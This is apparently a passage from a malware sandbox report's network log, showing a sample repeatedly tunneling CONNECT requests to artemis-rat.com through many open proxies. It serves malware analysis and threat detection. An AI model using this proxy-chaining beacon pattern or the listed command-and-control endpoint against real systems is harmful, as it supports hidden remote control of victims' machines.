                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124744892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217777014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
641192.168.2.550974213.136.79.177387723876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:40.106616020 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.201765060 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202899933 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.202224016 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.201805115 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
642192.168.2.55101298.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:40.116211891 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
643192.168.2.551889104.16.105.182803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:40.151587009 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.305865049 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
644192.168.2.551867150.136.153.231803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:40.156519890 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:12.446701050 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:13.149589062 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:13.853672981 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:15.197860003 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:17.886706114 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:23.197649956 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:33.949639082 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:31:55.454648018 CET  97  IN  HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
645192.168.2.55091945.86.87.6680803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:40.171080112 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.217530966 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.806389093 CET  202  IN  HTTP/1.0 404 Not Found
Content-Length: 715
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:20:47 GMT
Expires: Mon, 11 Mar 2024 02:20:47 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
646 | 192.168.2.5 | 51035 | 212.110.188.216 | 34405 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.171490908 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.201942921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202898026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.202224970 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.288724899 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
647 | 192.168.2.5 | 51927 | 104.22.37.236 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.187088013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.342483044 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
648 | 192.168.2.5 | 51951 | 104.17.215.222 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.207236052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.361737013 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
649 | 192.168.2.5 | 51849 | 202.40.181.220 | 31247 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.242360115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.186062098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
650 | 192.168.2.5 | 51959 | 72.167.221.188 | 49913 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.242896080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.686073065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.202819109 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.202280998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.201982975 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
651 | 192.168.2.5 | 51952 | 138.68.60.8 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.244553089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.849622011 CET | 28 | IN | HTTP/1.1 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
652 | 192.168.2.5 | 50946 | 103.194.88.107 | 32650 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.244905949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.887582064 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 700
Content-Type: text/html
Date: Thu, 07 Mar 2024 07:04:45 GMT
Expires: Thu, 07 Mar 2024 07:04:45 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            653192.168.2.551939162.214.227.68455403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.246021032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.732971907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.311415911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            654192.168.2.55187472.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.248585939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            655192.168.2.55187672.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.249469042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            656192.168.2.55111551.89.21.99643153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.249469995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355070114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            657192.168.2.551245107.180.90.88631003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.249954939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389441967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            658192.168.2.55187798.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.251539946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            659192.168.2.551878184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.254579067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            660192.168.2.551970104.16.109.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.255039930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.410424948 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            661192.168.2.55190072.210.252.134461643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.255409956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            662192.168.2.55120098.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.256594896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
663192.168.2.551941132.148.167.243482983876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.257617950 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
664192.168.2.551315132.148.16.169556103876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.258696079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.355124950 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405555010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.508852005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
665192.168.2.551916162.214.121.1129933876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.259730101 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.748610020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.514410973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.806396008 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
666192.168.2.551979172.67.181.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.259859085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.415175915 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
667192.168.2.551990104.20.123.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.267209053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
